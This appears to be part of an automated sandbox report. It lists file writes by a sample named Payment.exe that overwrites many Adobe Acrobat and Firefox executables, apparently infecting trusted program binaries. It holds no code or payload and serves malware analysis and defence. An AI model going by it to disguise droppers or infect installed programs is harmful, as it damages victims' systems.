                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
